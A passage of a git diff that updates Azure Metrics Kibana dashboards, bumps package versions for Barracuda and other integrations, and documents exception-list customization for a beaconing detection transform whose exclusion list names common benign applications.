+ "formula": "overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))",
 "isFormulaBroken": false
 },
 "references": [
@@ -876,11 +894,15 @@
 "9d4a0ed0-f231-4462-a164-0babab6e282bX0": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.file_share_snapshot_count.avg: *"
+ },
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_count.avg))",
- "operationType": "average",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": false
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_share_snapshot_count.avg"
@@ -889,7 +911,7 @@
 "customLabel": true,
 "dataType": "number",
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_count.avg))",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_count.avg))",
 "operationType": "overall_max",
 "references": [
 "9d4a0ed0-f231-4462-a164-0babab6e282bX0"
@@ -905,12 +927,12 @@
 },
 "isBucketed": false,
 "label": "File Share Snapshot Count",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "number"
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_share_snapshot_count.avg"
@@ -944,7 +966,7 @@
 "metricAccessor": "a9cc5858-41b5-4dc6-a06f-8a2c20f56190"
 }
 },
- "title": "Storage File Share Snapshot Count [Azure Metrics] (converted)",
+ "title": "Storage File Share Snapshot Count",
 "type": "lens",
 "visualizationType": "lnsMetric"
 },
@@ -959,7 +981,7 @@
 "y": 14
 },
 "panelIndex": "2d5c6c0f-f4d2-44fb-b7e5-1a855b75e40f",
- "title": "Storage File Share Snapshot Count [Azure Metrics]",
+ "title": "Storage File Share Snapshot Count",
 "type": "lens",
 "version": "8.7.0"
 },
@@ -994,18 +1016,22 @@
 "05ccf6a0-2c96-4739-9d44-605c279562f4": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.success_server_latency.avg: *"
+ },
 "isBucketed": false,
 "label": "SuccessServerLatency (ms)",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "number",
 "params": {
 "decimals": 1,
 "suffix": " ms"
 }
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.success_server_latency.avg"
@@ -1044,7 +1070,7 @@
 "params": {
 "dropPartials": true,
 "includeEmptyRows": true,
- "interval": "5m"
+ "interval": "auto"
 },
 "scale": "interval",
 "sourceField": "@timestamp"
@@ -1136,7 +1162,7 @@
 "yRightScale": "linear"
 }
 },
- "title": "Storage Success Server Latency [Azure Metrics] (converted)",
+ "title": "Storage Success Server Latency",
 "type": "lens",
 "visualizationType": "lnsXY"
 },
@@ -1191,7 +1217,7 @@
 "params": {
 "dropPartials": true,
 "includeEmptyRows": true,
- "interval": "5m"
+ "interval": "auto"
 },
 "scale": "interval",
 "sourceField": "@timestamp"
@@ -1225,18 +1251,22 @@
 "8376a8a7-8690-48eb-9db1-adec8860c89a": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.success_e2elatency.avg: *"
+ },
 "isBucketed": false,
 "label": "Success E2E Latency (ms)",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "number",
 "params": {
 "decimals": 1,
 "suffix": " ms"
 }
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.success_e2elatency.avg"
@@ -1328,7 +1358,7 @@
 "yRightScale": "linear"
 }
 },
- "title": "Storage Success E2E Latency [Azure Metrics] (converted)",
+ "title": "Storage Success E2E Latency",
 "type": "lens",
 "visualizationType": "lnsXY"
 },
@@ -1385,12 +1415,12 @@
 },
 "isBucketed": false,
 "label": "File Share Snapshot Size",
- "operationType": "average",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": true,
 "format": {
 "id": "bytes"
- }
+ },
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_share_snapshot_size.avg"
@@ -1398,10 +1428,10 @@
 "a67f2ce4-fc3a-4924-a5f5-c96e4474d4f3": {
 "dataType": "number",
 "isBucketed": false,
- "label": "overall_max(average(azure.storage_account.file_share_snapshot_size.avg))",
+ "label": "overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))",
 "operationType": "formula",
 "params": {
- "formula": "overall_max(average(azure.storage_account.file_share_snapshot_size.avg))",
+ "formula": "overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))",
 "isFormulaBroken": false
 },
 "references": [
@@ -1412,11 +1442,15 @@
 "a67f2ce4-fc3a-4924-a5f5-c96e4474d4f3X0": {
 "customLabel": true,
 "dataType": "number",
+ "filter": {
+ "language": "kuery",
+ "query": "azure.storage_account.file_share_snapshot_size.avg: *"
+ },
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_size.avg))",
- "operationType": "average",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))",
+ "operationType": "last_value",
 "params": {
- "emptyAsNull": false
+ "sortField": "@timestamp"
 },
 "scale": "ratio",
 "sourceField": "azure.storage_account.file_share_snapshot_size.avg"
@@ -1425,7 +1459,7 @@
 "customLabel": true,
 "dataType": "number",
 "isBucketed": false,
- "label": "Part of overall_max(average(azure.storage_account.file_share_snapshot_size.avg))",
+ "label": "Part of overall_max(last_value(azure.storage_account.file_share_snapshot_size.avg))",
 "operationType": "overall_max",
 "references": [
 "a67f2ce4-fc3a-4924-a5f5-c96e4474d4f3X0"
@@ -1461,7 +1495,7 @@
 "metricAccessor": "19e57c7d-acf6-4e08-b599-0269fa62707f"
 }
 },
- "title": "Storage File Share Snapshot Size [Azure Metrics] (converted)",
+ "title": "Storage File Share Snapshot Size",
 "type": "lens",
 "visualizationType": "lnsMetric"
 },
@@ -1476,7 +1510,7 @@
 "y": 22
 },
 "panelIndex": "c6792441-37b6-4ef4-ad8b-21f137b2f0b4",
- "title": "Storage File Share Snapshot Size [Azure Metrics]",
+ "title": "Storage File Share Snapshot Size",
 "type": "lens",
 "version": "8.7.0"
 },
@@ -1542,7 +1576,7 @@
 "params": {
 "dropPartials": true,
 "includeEmptyRows": true,
- "interval": "5m"
+ "interval": "auto"
 },
 "scale": "interval",
 "sourceField": "@timestamp"
@@ -1656,7 +1690,7 @@
 "yRightScale": "linear"
 }
 },
- "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)",
+ "title": "Storage Account Ingress Traffic",
 "type": "lens",
 "visualizationType": "lnsXY"
 },
@@ -1711,7 +1745,7 @@
 "params": {
 "dropPartials": true,
 "includeEmptyRows": true,
- "interval": "5m"
+ "interval": "auto"
 },
 "scale": "interval",
 "sourceField": "@timestamp"
@@ -1851,7 +1885,7 @@
 "yRightScale": "linear"
 }
 },
- "title": "Storage Account Egress Traffic [Azure Metrics] (converted)",
+ "title": "Storage Account Egress Traffic",
 "type": "lens",
 "visualizationType": "lnsXY"
 },
@@ -1876,7 +1910,7 @@
 "version": 1
 },
 "coreMigrationVersion": "8.7.0",
- "created_at": "2023-09-01T05:23:11.892Z",
+ "created_at": "2024-03-29T10:14:46.025Z",
 "id": "azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc",
 "migrationVersion": {
 "dashboard": "8.7.0"
diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json
index 55fb2955fbb..9f7da8e0969 100644
--- a/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json
+++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-eb3f05f0-ea9a-11e9-90ec-112a988266d5.json
@@ -42,7 +42,7 @@ "markdown": "### Azure Compute VM \n\n[**Overview**](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Guest Windows VM Metrics](#/dashboard/azure_metrics-b6b434c0-feae-11eb-8fff-87871c582eca) | [Guest Linux VM Metrics](#/dashboard/azure_metrics-d8e3c5f0-feaf-11eb-8fff-87871c582eca)", "openLinksInNewTab": false }, - "title": "Navigation Compute VM Overview [Azure Metrics]", + "title": "Navigation Compute VM Overview", "type": "markdown", "uiState": {} } @@ -1133,7 +1133,7 @@ "y": 18 }, "panelIndex": "14e225ef-6417-4377-b2cb-6b46b6693b78", - "title": "VM Disk Reads [Azure Metrics]", + "title": "VM Disk Reads", "type": "lens", "version": "8.4.0" }, diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json index 15c0d6e2df2..ae9adf4e7b4 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc.json @@ -49,6 +49,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { "data": { "aggs": [], @@ -66,7 +67,7 @@ "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [**Table**](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation Table Storage Overview [Azure Metrics]", + "title": "Navigation Table Storage Overview", "type": "markdown", "uiState": {} } 
@@ -79,6 +80,7 @@ "y": 0 }, "panelIndex": "204cbabc-fafd-472c-b106-bd08f5262b1f", + "title": "Navigation Table Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -114,10 +116,10 @@ "4ec7ad4b-9db8-47c7-98d7-19400cb70922": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.table_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.table_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.table_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.table_capacity.avg))", "isFormulaBroken": false }, "references": [ @@ -128,11 +130,15 @@ "4ec7ad4b-9db8-47c7-98d7-19400cb70922X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.table_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.table_capacity.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_capacity.avg" @@ -141,7 +147,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.table_capacity.avg))", "operationType": "overall_max", "references": [ "4ec7ad4b-9db8-47c7-98d7-19400cb70922X0" @@ -157,12 +163,12 @@ }, "isBucketed": false, "label": "Table Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_capacity.avg" 
@@ -196,7 +202,7 @@ "metricAccessor": "65b98bd8-f136-4716-9ec6-94443d4fac64" } }, - "title": "Storage Table Capacity [Azure Metrics] (converted)", + "title": "Storage Table Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -211,7 +217,7 @@ "y": 5 }, "panelIndex": "15b7c108-0214-4af6-9719-fab59affafec", - "title": "Storage Table Capacity [Azure Metrics]", + "title": "Storage Table Capacity", "type": "lens", "version": "8.7.0" }, @@ -253,12 +259,12 @@ }, "isBucketed": false, "label": "Table Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_count.avg" @@ -266,10 +272,10 @@ "c17ea056-b0cd-4821-a97c-8682579757c3": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.table_count.avg))", + "label": "overall_max(last_value(azure.storage_account.table_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.table_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.table_count.avg))", "isFormulaBroken": false }, "references": [ @@ -280,11 +286,15 @@ "c17ea056-b0cd-4821-a97c-8682579757c3X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.table_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.table_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_count.avg" 
@@ -293,7 +303,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.table_count.avg))", "operationType": "overall_max", "references": [ "c17ea056-b0cd-4821-a97c-8682579757c3X0" @@ -329,7 +339,7 @@ "metricAccessor": "2d62dcb1-64ad-46b4-9909-34975f4409ab" } }, - "title": "Storage Table Count [Azure Metrics] (converted)", + "title": "Storage Table Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -344,7 +354,7 @@ "y": 5 }, "panelIndex": "4177a6e6-97d7-447e-bcf3-ee9c1d660bd8", - "title": "Storage Table Count [Azure Metrics]", + "title": "Storage Table Count", "type": "lens", "version": "8.7.0" }, @@ -380,10 +390,10 @@ "303b0b16-adb3-4fa9-bd7c-67dc742d8f3e": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.table_entity_count.avg))", + "label": "overall_max(last_value(azure.storage_account.table_entity_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.table_entity_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.table_entity_count.avg))", "isFormulaBroken": false }, "references": [ @@ -394,11 +404,15 @@ "303b0b16-adb3-4fa9-bd7c-67dc742d8f3eX0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.table_entity_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_entity_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.table_entity_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_entity_count.avg" 
@@ -407,7 +421,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.table_entity_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.table_entity_count.avg))", "operationType": "overall_max", "references": [ "303b0b16-adb3-4fa9-bd7c-67dc742d8f3eX0" @@ -423,12 +437,12 @@ }, "isBucketed": false, "label": "Table Entity Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.table_entity_count.avg" @@ -462,7 +476,7 @@ "metricAccessor": "fa522977-cc94-4c29-b0fd-812045d19c42" } }, - "title": "Storage Table Entity Count [Azure Metrics] (converted)", + "title": "Storage Table Entity Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -477,7 +491,7 @@ "y": 5 }, "panelIndex": "28d85d90-3881-4d1f-b60c-43b545fc9f0e", - "title": "Storage Table Entity Count [Azure Metrics]", + "title": "Storage Table Entity Count", "type": "lens", "version": "8.7.0" }, @@ -516,7 +530,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -524,18 +538,22 @@ "2481e81f-e447-4eee-9c37-2ecd948035f2": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " %" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" 
@@ -626,7 +644,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, @@ -681,7 +699,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -811,7 +829,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -892,7 +910,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -900,18 +918,22 @@ "727a5c36-c364-41c8-8b05-ae24da3122ec": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -1003,7 +1025,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, 
@@ -1079,18 +1101,22 @@ "77a4e9f4-1a06-46b4-b1a6-7ca0d8802e12": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" @@ -1103,7 +1129,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1195,7 +1221,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1276,7 +1302,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1390,7 +1416,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1493,7 +1519,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1585,7 +1611,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1610,7 +1636,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T05:45:24.377Z", + "created_at": "2024-03-29T10:13:36.125Z", "id": "azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" 
diff --git a/packages/azure_metrics/manifest.yml b/packages/azure_metrics/manifest.yml
index 2ebbf6364b4..f9cda0d94f2 100644
--- a/packages/azure_metrics/manifest.yml
+++ b/packages/azure_metrics/manifest.yml
@@ -1,6 +1,6 @@
 name: azure_metrics
 title: Azure Resource Metrics
-version: 1.4.1
+version: 1.5.0
 release: ga
 description: Collect metrics from Azure resources with Elastic Agent.
 type: integration
diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml
index fef1ca672a3..85bb4c9035e 100644
--- a/packages/barracuda/changelog.yml
+++ b/packages/barracuda/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.12.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9390
 - version: "1.11.2"
 changes:
 - description: Changed owners
diff --git a/packages/barracuda/manifest.yml b/packages/barracuda/manifest.yml
index 3e5c422dac1..7f921d6dacb 100644
--- a/packages/barracuda/manifest.yml
+++ b/packages/barracuda/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.1"
+format_version: "3.0.3"
 name: barracuda
 title: "Barracuda Web Application Firewall"
-version: "1.11.2"
+version: "1.12.0"
 description: "Collect logs from Barracuda Web Application Firewall with Elastic Agent."
 type: integration
 source:
diff --git a/packages/barracuda_cloudgen_firewall/changelog.yml b/packages/barracuda_cloudgen_firewall/changelog.yml
index c1eea6d8cd2..8ea2464cbc3 100644
--- a/packages/barracuda_cloudgen_firewall/changelog.yml
+++ b/packages/barracuda_cloudgen_firewall/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.11.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9390
 - version: "1.10.1"
 changes:
 - description: Changed owners
diff --git a/packages/barracuda_cloudgen_firewall/manifest.yml b/packages/barracuda_cloudgen_firewall/manifest.yml
index 751ef008aac..9821b00bf6c 100644
--- a/packages/barracuda_cloudgen_firewall/manifest.yml
+++ b/packages/barracuda_cloudgen_firewall/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: barracuda_cloudgen_firewall
 title: Barracuda CloudGen Firewall Logs
-version: "1.10.1"
+version: "1.11.0"
 description: Collect logs from Barracuda CloudGen Firewall devices with Elastic Agent.
 categories: ["network", "security", "firewall_security"]
 type: integration
diff --git a/packages/beaconing/changelog.yml b/packages/beaconing/changelog.yml
index 677e7215a03..144e749083a 100644
--- a/packages/beaconing/changelog.yml
+++ b/packages/beaconing/changelog.yml
@@ -1,3 +1,8 @@
+- version: "1.2.0"
+ changes:
+ - description: Update transform exceptionlist
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9332
 - version: "1.1.0"
 changes:
 - description: Update package docs
diff --git a/packages/beaconing/docs/README.md b/packages/beaconing/docs/README.md
index e1682022908..2aa884b7528 100644
--- a/packages/beaconing/docs/README.md
+++ b/packages/beaconing/docs/README.md
@@ -48,8 +48,18 @@ The transform, which runs every hour, also filters out common, known application The values highlighted above are typical of beaconing behavior and can help with your investigation. +## Exceptionlist customizations + +There are two places where you can customize which processes are on an exceptionlist for this detection. The first is in the transforms: these contain processes which are common, and thus it is beneficial for the transform's performance and data processing to keep some processes here. You can read more on how to customize the transforms in the next section. + +We also provide a default exceptionlist in the rules, which you can [inspect and customize in the UI](https://www.elastic.co/guide/en/security/current/detections-ui-exceptions.html). The source can be viewed [here](https://github.com/elastic/detection-rules/tree/main/rules/integrations/beaconing). + ## Further customizations -Advanced users can also tune the scripted metric aggregation's parameters, such as jitter percentage or time window. To overwrite the default parameters: delete the transform, change the parameters, and restart the transform. The configurable parameters are: + +Advanced users can also tune the scripted metric aggregation's parameters, such as jitter percentage or time window. Navigate to Transforms on your Elastic cluster and find the transform installed by this package (search `beaconing`). You can browse the source of the transform there by clicking on the `.json` tab; the source code of the latest version can also be viewed [here](https://github.com/elastic/integrations/blob/main/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml#L364). + +To overwrite the default parameters: stop the transform installed by the package, clone the transform, change the parameters of the cloned transform, then start the cloned transform. 
The configurable parameters are: + * `number_buckets_in_range`: The number of time buckets into which the time window is split. Using more buckets improves estimates for various statistics, but also increases resource usage. * `time_bucket_length`: The length of each time bucket. A higher value indicates a longer time window. Set this to a higher value to check for very low-frequency beacons. * `number_destination_ips`: The number of destination IPs to collect in results. Setting this to a higher value increases resource usage. diff --git a/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml b/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml index 90cd9dd2d4a..cd6dce36da9 100644 --- a/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml +++ b/packages/beaconing/elasticsearch/transform/pivot_transform/transform.yml @@ -1,6 +1,6 @@ dest: - index: ml_beaconing-1.1.0 - pipeline: 1.1.0-ml_beaconing_ingest_pipeline + index: ml_beaconing-1.2.0 + pipeline: 1.2.0-ml_beaconing_ingest_pipeline aliases: - alias: ml_beaconing.latest move_on_creation: true 
@@ -361,7 +361,7 @@ source: minimum_should_match: 1 must_not: terms: - 'process.name': ["Acrobat.exe", "AcroCEF.exe", "AcroCEF Helper", "AddressBookSourceSync", "Adobe_CCXProcess.node", "Adobe CEF Helper", "Adobe CEF Helper.exe", "AdobeCollabSync.exe", "Adobe Desktop Service", "Adobe Desktop Service.exe", "accountsd", "akd", "appstoreagent", "apsd", "atmgr.exe", "assistantd", "backgroundTaskHost.exe", "BackgroundTransferHost.exe", "Brave Browser Helper", "CalendarAgent", "Camtasia 2020", "CCXProcess", "chrome.exe", "cloudd", "Code.exe", "Code Helper", "Code Helper (Renderer)", "CompatTelRunner.exe", "com.apple.geod", "com.apple.ncplugin.stocks", "com.apple.Safari.SafeBrowsing.Service", "com.apple.WebKit.Networking", "com.docker.vpnkit", "commerce", "Core Sync", "CoreSync.exe", "default-browser-agent.exe", "DeliveryService.exe", "DeviceCensus.exe", "Docker", "Dropbox", "Dsapi.exe", "elastic-agent", "elastic-agent.exe", "elastic-endpoint", "esensor", "EXCEL.EXE", "explorer.exe", "familycircled", "filebeat", "filebeat.exe", "FileCoAuth.exe", "firefox", "firefox.exe", "GitHub Desktop Helper", "Google Chrome Helper", "google_osconfig_agent", "google_osconfig_agent.exe", "google_guest_agent", "GCEWindowsAgent.exe", "Google Drive", "GoogleDriveFS.exe", "GoogleUpdate.exe", "IMRemoteURLConnectionAgent", "jamf", "keybase", "ksfetch", "Lenovo.Modern.ImController.PluginHost.CompanionApp.exe", "LenovoVantageService.exe", "locationd", "mapspushd", "mcautoreg.exe", "metricbeat", "mdmclient", "Mail", "MMSSHOST.exe", "Microsoft Excel", "Microsoft.Management.Services.IntuneWindowsAgent.exe", "Microsoft OneNote", "Microsoft PowerPoint", "Microsoft Teams Helper", "Microsoft Teams Helper (Renderer)", "Microsoft Update Assistant", "Microsoft Word", "ModuleCoreService.exe", "msedge.exe", "node", "node.exe", "nsurlsessiond", "OfficeC2RClient.exe", "ONENOTE.EXE", "officesvcmgr.exe", "OfficeClickToRun.exe", "OneDrive.exe", "parsec-fbf", "parsecd", "pingsender.exe", "SDXHelper.exe", 
"SearchApp.exe", "ServiceLayer.exe", "Skype for Business", "Slack.exe", "Slack Helper", "snapd", "smartscreen.exe", "softwareupdated", "Spotify.exe", "Spotify Helper", "ssm-agent-worker.exe", "ssm-document-worker.exe", "syspolicyd", "SystemIdleCheck.exe", "taskhostw.exe", "Teams", "Teams.exe", "trustd", "updater", "WINWORD.EXE", "WhatsApp Helper", "xpcproxy", "Zoom.exe", "zoom.us", "ZoomPresence"] + 'process.name': ["Acrobat.exe", "AcroCEF.exe", "AcroCEF Helper", "AddressBookSourceSync", "Adobe_CCXProcess.node", "Adobe CEF Helper", "Adobe CEF Helper.exe", "AdobeCollabSync.exe", "Adobe Desktop Service", "Adobe Desktop Service.exe", "accountsd", "akd", "appstoreagent", "apsd", "atmgr.exe", "assistantd", "backgroundTaskHost.exe", "BackgroundTransferHost.exe", "Brave Browser Helper", "CalendarAgent", "Camtasia 2020", "CCXProcess", "chrome.exe", "cloudd", "Code.exe", "Code Helper", "Code Helper (Renderer)", "CompatTelRunner.exe", "com.apple.geod", "com.apple.ncplugin.stocks", "com.apple.Safari.SafeBrowsing.Service", "com.apple.WebKit.Networking", "com.docker.vpnkit", "commerce", "Core Sync", "CoreSync.exe", "default-browser-agent.exe", "DeliveryService.exe", "DeviceCensus.exe", "Docker", "Dropbox", "Dsapi.exe", "elastic-agent", "elastic-agent.exe", "elastic-endpoint", "esensor", "EXCEL.EXE", "explorer.exe", "familycircled", "filebeat", "filebeat.exe", "FileCoAuth.exe", "firefox", "firefox.exe", "GitHub Desktop Helper", "Google Chrome Helper", "google_osconfig_agent", "google_osconfig_agent.exe", "google_guest_agent", "GCEWindowsAgent.exe", "Google Drive", "GoogleDriveFS.exe", "GoogleUpdate.exe", "IMRemoteURLConnectionAgent", "jamf", "keybase", "ksfetch", "Lenovo.Modern.ImController.PluginHost.CompanionApp.exe", "LenovoVantageService.exe", "locationd", "mapspushd", "mcautoreg.exe", "metricbeat", "mdmclient", "Mail", "MMSSHOST.exe", "Microsoft Excel", 